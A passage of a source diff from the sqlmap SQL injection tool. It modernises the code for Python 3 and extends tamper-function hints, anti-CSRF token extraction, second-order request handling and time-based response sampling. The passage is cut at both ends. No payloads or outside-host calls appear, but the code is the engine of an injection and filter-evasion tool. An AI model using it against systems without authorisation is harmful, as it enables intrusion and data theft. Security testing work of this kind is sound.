 errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
 raise SqlmapConnectionException(errMsg)
+elif "SqlmapCompressionException" in tbMsg:
+warnMsg = "problems with response (de)compression"
+retrying = True
 else:
 warnMsg = "unable to connect to the target URL"
@@ -719,7 +732,7 @@ class Connect(object):
 else:
 logger.debug(warnMsg)
 return Connect._retryProxy(**kwargs)
-elif kb.testMode:
+elif kb.testMode or isMultiThreadMode():
 logger.critical(warnMsg)
 return None, None, None
 else:

@@ -738,16 +751,16 @@ class Connect(object):
 if conn and getattr(conn, "redurl", None):
 _ = urlparse.urlsplit(conn.redurl)
 _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else ""))
-requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", "\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)
+requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1)

 if kb.resendPostOnRedirect is False:
-requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", "\g<1>GET ", requestMsg)
+requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg)
 requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg)
 requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg)

 responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
 else:
-responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
+responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status)

 if responseHeaders:
 logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])

@@ -766,7 +779,8 @@ class Connect(object):
 return page, responseHeaders, code

 @staticmethod
-def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
+@stackedmethod
+def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False):
 """
 This method calls a function to get the target URL page content
 and returns its page ratio (0 <= ratio <= 1) or a boolean value
@@ -804,7 +818,7 @@ class Connect(object):

 if conf.httpHeaders:
 headers = OrderedDict(conf.httpHeaders)
-contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
+contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers)

 if (kb.postHint or conf.skipUrlEncode) and postUrlEncode:
 postUrlEncode = False

@@ -813,11 +827,15 @@ class Connect(object):
 conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

 if payload:
-if kb.tamperFunctions:
+delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER)

+if not disableTampering and kb.tamperFunctions:
 for function in kb.tamperFunctions:
+hints = {}

 try:
-payload = function(payload=payload, headers=auxHeaders)
+payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints)
-except Exception, ex:
+except Exception as ex:
 errMsg = "error occurred while running tamper "
 errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex))
 raise SqlmapGenericException(errMsg)
@@ -829,6 +847,18 @@ class Connect(object):

 value = agent.replacePayload(value, payload)

+if hints:
+if HINT.APPEND in hints:
+value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND])

+if HINT.PREPEND in hints:
+if place == PLACE.URI:
+match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value)
+if match:
+value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0)))
+else:
+value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value)

 logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))

 if place == PLACE.CUSTOM_POST and kb.postHint:

@@ -837,24 +867,18 @@ class Connect(object):
 # with their HTML encoded counterparts
 payload = payload.replace('>', "&gt;").replace('<', "&lt;")
 elif kb.postHint == POST_HINT.JSON:
-if payload.startswith('"') and payload.endswith('"'):
-payload = json.dumps(payload[1:-1])
-else:
-payload = json.dumps(payload)[1:-1]
+payload = escapeJsonValue(payload)
 elif kb.postHint == POST_HINT.JSON_LIKE:
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
-if payload.startswith('"') and payload.endswith('"'):
-payload = json.dumps(payload[1:-1])
-else:
-payload = json.dumps(payload)[1:-1]
+payload = escapeJsonValue(payload)
 payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
 value = agent.replacePayload(value, payload)
 else:
 # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
-if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
+if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode:
 skip = False

-if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
+if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper():
 if kb.cookieEncodeChoice is None:
 msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
 kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)

@@ -862,12 +886,14 @@ class Connect(object):
 skip = True

 if not skip:
-payload = urlencode(payload, '%', False, place != PLACE.URI) # spaceplus is handled down below
+if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path)
+value = urlencode(value, spaceplus=kb.postSpaceToPlus)
+payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus)
 value = agent.replacePayload(value, payload)
 postUrlEncode = False

 if conf.hpp:
-if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
+if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)):
 warnMsg = "HTTP parameter pollution should work only against "
 warnMsg += "ASP(.NET) targets"
 singleTimeWarnMessage(warnMsg)
@@ -932,70 +958,84 @@ class Connect(object):

 if value and place == PLACE.CUSTOM_HEADER:
 if value.split(',')[0].capitalize() == PLACE.COOKIE:
-cookie = value.split(',', 1)[1]
+cookie = value.split(',', 1)[-1]
 else:
-auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]
+auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]

 if conf.csrfToken:
 def _adjustParameter(paramString, parameter, newValue):
 retVal = paramString
-match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString)
+match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I)
 if match:
-retVal = re.sub(re.escape(match.group(0)), "%s=%s" % (parameter, newValue), paramString)
+retVal = re.sub("(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString)
 else:
-match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString)
+match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I)
 if match:
-retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
+retVal = re.sub("(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
 return retVal

+token = AttribDict()
 page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
-token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
+match = re.search(r"(?i)<input[^>]+\bname=[\"']?(?P<name>%s)\b[^>]*\bvalue=[\"']?(?P<value>[^>'\"]*)" % conf.csrfToken, page or "", re.I)

+if not match:
+match = re.search(r"(?i)<input[^>]+\bvalue=[\"']?(?P<value>[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P<name>%s)\b" % conf.csrfToken, page or "", re.I)

+if not match:
+match = re.search(r"(?P<name>%s)[\"']:[\"'](?P<value>[^\"']+)" % conf.csrfToken, page or "", re.I)

+if not match:
+match = re.search(r"\b(?P<name>%s)\s*[:=]\s*(?P<value>\w+)" % conf.csrfToken, str(headers), re.I)

+if not match:
+match = re.search(r"\b(?P<name>%s)\s*=\s*['\"]?(?P<value>[^;'\"]+)" % conf.csrfToken, page or "", re.I)

+if match:
+token.name, token.value = match.group("name"), match.group("value")

+match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value)
+if match:
+token.value = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(','))

 if not token:
-token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
+if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == httplib.OK:

-if not token:
-match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
-token = match.group(1) if match else None

-if not token:
-if conf.csrfUrl != conf.url and code == httplib.OK:
 if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
-token = page
+token.name = conf.csrfToken
+token.value = page

-if not token and conf.cj and any(_.name == conf.csrfToken for _ in conf.cj):
+if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj):
 for _ in conf.cj:
-if _.name == conf.csrfToken:
-token = _.value
-if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
+if re.search(conf.csrfToken, _.name, re.I):
+token.name, token.value = _.name, _.value
+if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
 if post:
-post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)
 elif get:
-get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)
+get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value)
 else:
-get = "%s=%s" % (conf.csrfToken, token)
+get = "%s=%s" % (token.name, token.value)
 break

 if not token:
-errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url)
+errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url)
 if not conf.csrfUrl:
 errMsg += ". You can try to rerun by providing "
 errMsg += "a valid value for option '--csrf-url'"
-raise SqlmapTokenException, errMsg
+raise SqlmapTokenException(errMsg)

 if token:
-token = token.strip("'\"")
+token.value = token.value.strip("'\"")

 for place in (PLACE.GET, PLACE.POST):
 if place in conf.parameters:
 if place == PLACE.GET and get:
-get = _adjustParameter(get, conf.csrfToken, token)
+get = _adjustParameter(get, token.name, token.value)
 elif place == PLACE.POST and post:
-post = _adjustParameter(post, conf.csrfToken, token)
+post = _adjustParameter(post, token.name, token.value)

 for i in xrange(len(conf.httpHeaders)):
-if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower():
-conf.httpHeaders[i] = (conf.httpHeaders[i][0], token)
+if conf.httpHeaders[i][0].lower() == token.name.lower():
+conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value)

 if conf.rParam:
 def _randomizeParameter(paramString, randomParameter):
@@ -1039,7 +1079,7 @@ class Connect(object):
 name = safeVariableNaming(name)
 elif name in keywords:
 name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
-value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
+value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus))
 variables[name] = value

 if cookie:

@@ -1058,7 +1098,7 @@ class Connect(object):
 while True:
 try:
 compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
-except SyntaxError, ex:
+except SyntaxError as ex:
 if ex.text:
 original = replacement = ex.text.strip()
 if '=' in original:

@@ -1086,7 +1126,7 @@ class Connect(object):
 originals.update(variables)
 evaluateCode(conf.evalCode, variables)

-for variable in variables.keys():
+for variable in list(variables.keys()):
 if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
 value = variables[variable]
 del variables[variable]
@@ -1109,33 +1149,33 @@ class Connect(object):
 if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
 if re.search(r"<%s\b" % re.escape(name), post):
 found = True
-post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
 elif re.search(r"\b%s>" % re.escape(name), post):
 found = True
-post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)

 regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
 if not found and re.search(regex, (post or "")):
 found = True
-post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
+post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)

 regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
 if not found and re.search(regex, (post or "")):
 found = True
-post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
+post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)

 if re.search(regex, (get or "")):
 found = True
-get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
+get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)

 if re.search(regex, (query or "")):
 found = True
-uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
+uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)

 regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
 if re.search(regex, (cookie or "")):
 found = True
-cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
+cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)

 if not found:
 if post is not None:
@@ -1162,11 +1202,11 @@ class Connect(object):
|
|||||||
|
|
||||||
if conf.tor:
|
if conf.tor:
|
||||||
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
||||||
warnMsg += "time-based injections because of its high latency time"
|
warnMsg += "time-based injections because of inherent high latency time"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
||||||
warnMsg += "larger statistical model, please wait"
|
warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of")
|
||||||
dataToStdout(warnMsg)
|
dataToStdout(warnMsg)
|
||||||
|
|
||||||
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
||||||
@@ -1221,14 +1261,17 @@ class Connect(object):
|
|||||||
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
_, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
|
||||||
|
|
||||||
if headers:
|
if headers:
|
||||||
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
|
try:
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
|
if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH):
|
||||||
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
|
pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0])
|
||||||
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE):
|
||||||
|
pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])
|
||||||
|
except ValueError:
|
||||||
|
pass
|
||||||
finally:
|
finally:
|
||||||
kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
|
|
||||||
if not pageLength:
|
if pageLength is None:
|
||||||
try:
|
try:
|
||||||
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
|
||||||
except MemoryError:
|
except MemoryError:
|
||||||
@@ -1236,11 +1279,20 @@ class Connect(object):
     warnMsg = "site returned insanely large response"
     if kb.testMode:
         warnMsg += " in testing phase. This is a common "
-        warnMsg += "behavior in custom WAF/IPS/IDS solutions"
+        warnMsg += "behavior in custom WAF/IPS solutions"
     singleTimeWarnMessage(warnMsg)
 
-if conf.secondOrder:
-    page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
+if conf.secondUrl:
+    page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
+elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""):
+    def _(value):
+        if kb.customInjectionMark in (value or ""):
+            if payload is None:
+                value = value.replace(kb.customInjectionMark, "")
+            else:
+                value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value)
+        return value
+
+    page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
 
 threadData.lastQueryDuration = calculateDeltaSeconds(start)
 threadData.lastPage = page
@@ -1256,12 +1308,18 @@ class Connect(object):
 elif noteResponseTime:
     kb.responseTimes.setdefault(kb.responseTimeMode, [])
     kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration)
+
+    if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES:
+        kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:]
 
 if not response and removeReflection:
     page = removeReflectiveValues(page, payload)
 
 kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
-kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
+message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I)
+if message:
+    kb.permissionFlag = True
+    singleTimeWarnMessage("potential permission problems detected ('%s')" % message)
 
 if content or response:
     return page, headers, code
@@ -1271,5 +1329,5 @@ class Connect(object):
 else:
     return comparison(page, headers, code, getRatioValue, pageLength)
 
-def setHTTPHandlers():  # Cross-linked function
+def setHTTPHandlers():  # Cross-referenced function
     raise NotImplementedError
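Side note on the hunk above (not part of the diff): the patched null-connection code takes only the first comma-separated Content-Length value and guards the conversion because proxies may fold duplicate headers into one value, which a bare int() cannot parse. A minimal sketch under that assumption, with a hypothetical helper name, not sqlmap code:

    # Minimal sketch, not sqlmap code: parse a possibly folded Content-Length value.
    def parse_content_length(raw):
        try:
            # a proxy may merge duplicate headers into "1024, 1024"
            return int(raw.split(',')[0])
        except ValueError:
            return None

    assert parse_content_length("1024") == 1024
    assert parse_content_length("1024, 1024") == 1024
    assert parse_content_length("junk") is None
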
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -1,10 +1,12 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import os
 import re
 import socket
@@ -145,13 +147,13 @@ if __name__ == "__main__":
             if _ is None:
                 break
             else:
-                print "[i] %s" % _
+                print("[i] %s" % _)
 
         time.sleep(1)
 
-except socket.error, ex:
+except socket.error as ex:
     if 'Permission' in str(ex):
-        print "[x] Please run with sudo/Administrator privileges"
+        print("[x] Please run with sudo/Administrator privileges")
     else:
         raise
 except KeyboardInterrupt:
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
@@ -12,6 +12,7 @@ import socket
 import urllib2
 
 from lib.core.common import getSafeExString
+from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
@@ -48,7 +49,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
 
         # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
         #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
-        if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"):
+        if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"):
             for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
                 try:
                     sock = create_sock()
@@ -62,7 +63,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
                         break
                     else:
                         sock.close()
-                except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine) as ex:
                     self._tunnel_host = None
                     logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
 
@@ -82,7 +83,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
                         break
                     else:
                         sock.close()
-                except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex:
+                except (ssl.SSLError, socket.error, httplib.BadStatusLine) as ex:
                     self._tunnel_host = None
                     logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex))
 
@@ -1,10 +1,12 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """
 
+from __future__ import print_function
+
 import re
 import time
 
@@ -33,6 +35,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
+from lib.core.decorators import stackedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import CHARSET_TYPE
 from lib.core.enums import DBMS
@@ -46,6 +49,7 @@ from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS
 from lib.core.settings import INFERENCE_MARKER
 from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
 from lib.core.settings import SQL_SCALAR_REGEX
+from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 from lib.request.connect import Connect as Request
 from lib.request.direct import direct
@@ -75,6 +79,9 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar
 
     value = _goDns(payload, expression)
 
+    if payload is None:
+        return None
+
     if value is not None:
         return value
 
@@ -174,10 +181,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
     # forge the SQL limiting the query output one entry at a time
    # NOTE: we assume that only queries that get data from a table
    # can return multiple entries
-    if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \
-            not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \
-            expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \
-            and not re.search(SQL_SCALAR_REGEX, expression, re.I):
+    if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I):
         expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression)
 
         if limitCond:
@@ -275,7 +279,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char
                 raise SqlmapDataException(errMsg)
 
     except KeyboardInterrupt:
-        print
+        print()
         warnMsg = "user aborted during dumping phase"
         logger.warn(warnMsg)
 
@@ -335,6 +339,7 @@ def _goUnion(expression, unpack=True, dump=False):
 
     return output
 
+@stackedmethod
 def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
     """
     Called each time sqlmap inject a SQL query on the SQL injection
@@ -437,7 +442,8 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
     found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
 
     if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found:
-        kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", re.sub(r"(?i)(\w+)\(.+\)", r"\g<1>", expression))) if re.search(r"(?i)SELECT.+FROM", expression) else None
+        match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression)
+        kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None
 
         if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME):
             kb.technique = PAYLOAD.TECHNIQUE.TIME
@@ -471,6 +477,15 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
             warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else ""
             singleTimeWarnMessage(warnMsg)
 
+    # Dirty patch (safe-encoded unicode characters)
+    if isinstance(value, unicode) and "\\x" in value:
+        try:
